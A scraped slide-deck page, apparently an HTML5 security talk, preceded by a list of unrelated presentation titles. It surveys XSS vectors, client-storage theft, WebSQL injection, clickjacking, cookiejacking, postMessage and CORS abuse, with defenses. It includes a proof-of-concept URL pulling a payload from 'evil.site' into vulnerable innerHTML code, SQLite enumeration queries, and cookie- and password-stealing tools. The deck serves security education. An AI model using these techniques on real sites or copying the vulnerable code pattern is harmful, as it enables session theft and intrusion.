Food processing presentation for bsc agriculture honsFood processing presentation for bsc agriculture hons
Food processing presentation for bsc agriculture hons
 
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)
 
Raw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptxRaw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptx
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...
 
Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
 
Full Stack Web Development Course for Beginners
Full Stack Web Development Course for BeginnersFull Stack Web Development Course for Beginners
Full Stack Web Development Course for Beginners
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERP
 

Talk about html5 security

  • 2. Introduction to HTML5  HTML5 threat model  Vulnerabilities & Defense  Tools  Reference
  • 3. History  HTML1.0——1993.6 Not Standard  HTML 2.0——1995.11 RFC 1866  HTML 3.2——1996.1.14 W3C Recommended Standard  HTML 4.0——1997.12.18 W3C Recommended Standard  HTML 4.01——1999.12.24 W3C Recommended Standard  XHTML——2000.1.20 W3C Recommended Standard  HTML5——2008 First Draft Standard  2012 W3C Candidate Recommendation
  • 4. Features  The three aspects of HTML5 ▪ Content HTML ▪ New Tags and Attributes ▪ Presentation of content CSS ▪ Interaction with content JavaScript ▪ Add New API Drag LocalStorage WebWorkers etc
  • 5. Features
  • 6.
  • 7.
  • 8. XSS abuse with tags and attributes  Hiding URL Code  Stealing from the storage  Injecting and Exploiting WebSQL  ClickJacking &&CookieJacking  Cross Origin Request and postMessage  Client‐side File Includes  Botnet and widgets
  • 9. In:  New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>  New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for input  New media events  New <canvas> tag for 2D rendering  New form controls for date and time  Geolocation  New selectors  Client-side storage including localStorage, sessionStorage, and WebSQL  Out:  Presentation elements such a <font>, <center>  Presentation attributes including align, border  <frame>,<frameset>  <applet>  Old special effects: <marquee>,<bgsound>  <noscript>
  • 10. Attack:  New XSS Vector  Bypass Black-list Filter  Defense:  Add new tags to Black-list  Change Regex
  • 11.
  • 12. DOM  window.history.back();  window.history.forward();  window.history.go();  HTML5  history.pushState() ▪ history.pushState(state object,title,URL);  history.replaceState() ▪ The same with pushState,but modifies the current history entry.
  • 14.
  • 15. Type  LocalStorage:for long-term storage  SessionStorage:for the session application(last when the browser closed)  Differences  Cookies:4k  LocalStorage/ SessionStorage:depends on browser(usually 5MB)  Support  Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
  • 16.
  • 17. Function  (localStorage | sessionStorage).setItem()  (localStorage | sessionStorage).getItem()  (localStorage | sessionStorage).deleteItem()  (localStorage | sessionStorage).clear()
  • 18. Attack  Get the data from the storage(cookie,passwd,etc)  Storage your xss shellcode  Unlimit the path  Defense  Don’t store sensitive data in local storage  Don't use local storage for session identifiers  Stick with cookies and use the HTTPOnly and Secure flags
  • 19.
  • 20. Database Storage  The same as the Google Gears  Operate  openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");  transaction("YOUR SQL STATEMENT HERE");  executeSql();  Type  SQLite (support by WebKit)
  • 21. Attack  Store shellcode  SQL inject  Defense  Strick with the sql operate  Encode the sql result before display  Don’t store sensitive data
  • 22. Store shellcode
  • 23. SQL Injection  Use sqlite_master ▪ SELECT name FROM sqlite_master WHERE type='table' ▪ SELECT sql FROM sqlite_master WHERE name='table_name' ▪ SELECT sqlite_version()  Select with ? ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); False ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True
  • 24. Drag and drop basics  Drag Data  the drag feedback image  drag effects  Drag events:  dragstart  dragenter  dragover  dragleave  drag  drop  dragend
  • 25.
  • 26. ClickJacking  XSS + Drag
  • 27.
  • 28. CookieJacking  Use many technology to steal user’s local cookies  Technology  How to read the local fileiframe+file://  How to detect the state of cookies Clickjacking  How to send cookiesSMB
  • 29.
  • 30. Defense  Use iframe with sandbox  If (top !== window) top.location= window.location.href;  if (top!=self) top.location.href=self.location.href
  • 31. postMessage  Send ▪ otherWindow.postMessage(message, targetOrigin);  Receive window.addEventListener("message", receiveMessage, false); function receiveMessage(event) { if (event.origin !== "http://example.org:8080") return; // ... }
  • 32.
  • 33. Defense  Check the postMessage origin  Don’t use innerHTML ▪ Element.innerHTML=e.data;//danger ▪ Element.textContent=e.data;//safe  Don’t use Eval to deal with the mesage
  • 34. Cross-Origin Resource Sharing ▪ Originally Ajax calls were subject to Same Origin Policy ▪ Site A cannot make XMLHttpRequests to Site B ▪ HTML5 makes it possible to make these cross domain calls ▪ Site ASite B(Response must include a header) ▪ Access-Control-Allow-Origin: Site A Must ▪ Access-Control-Allow-Credentials: true | false ▪ Access-Control-Expose-Headers: ▪ etc
  • 35.
  • 36.
  • 37. Defense  Don’t set this: Access-Control-Allow-Origin: * ▪ (Flash crossdomain.xml )  Prevent DDOS ▪ if(origin=="Site A"){header(Access-Control-Allow- Origin:Site A)……//process request}
  • 38. Code like this: <html><body><script> x = new XMLHttpRequest(); x.open("GET",location.hash.substring(1)); x.onreadystatechange=function(){if(x.readyState==4){ document.getElementById("main").innerHTML=x.responseText;}} x.send(); </script> <div id=“main”></div> </body></html>  POC  Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php  VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>  New type of XSS!!
  • 39.
  • 40. Web Workers  running scripts in the background independently  Very simple var w = new Worker("some_script.js"); w.onmessage = function(e) { // do something }; w.terminate()  Access ▪ XHR,navigator object,application cache,spawn other workers!  Can’t access ▪ DOM,window,document objects
  • 41. Attack  Botnet ▪ Application‐level DDoS attacks ▪ Email Spam ▪ Distributed password cracking  Network Scanning  Guessing User’s Private IP Address ▪ Identify the user’s subnet ▪ Identify the IP address
  • 42. COR+XSS+Workers=shell of the future
  • 43. HTML5CSdump  enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name  JS-Recon  Port Scans  Network Scans  Detecting private IP address
  • 44. Imposter  Steal cookies  Set cookies  Steal Local Shared Objects  Steal stored passwords from FireFox  etc  Shell of the Future  Reverse Web Shell handler  Bypass anti-session hijacking measures
  • 45. Ravan  JavaScript based Distributed Computing system  hashing algorithms ▪ MD5 ▪ SHA1 ▪ SHA256 ▪ SHA512
  • 46.  HTML5 带来的新安全威胁:xisigr  Attacking with HTML5:lavakumark  Abusing HTML5:Ming Chow  HTML5 Web Security:Thomas Röthlisberger  Abusing HTML 5 Structured Client-side Storage:Alberto Trivero  Cookiejacking:Rosario Valotta  http://heideri.ch/jso/#html5  http://www.wooyun.org/bugs/wooyun-2011-02351  http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and- dom-l3-top-10-attacks.html  http://www.html5test.com
  • 47. http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe. html  http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox  http://code.google.com/intl/zh-CN/apis/gears/api_database.html  http://michael-coates.blogspot.com/2010/07/html5-local-storage- and-xss.html  http://www.w3.org/TR/access-control/  http://m-austin.com/blog/?p=19  https://developer.mozilla.org/en/  http://www.w3.org/TR/cors/  http://www.andlabs.org/tools/ravan.html  http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/
  • 48. Contact Me  email:youstar@foxmail.com  Site:  www.codesec.info  www.insight-labs.org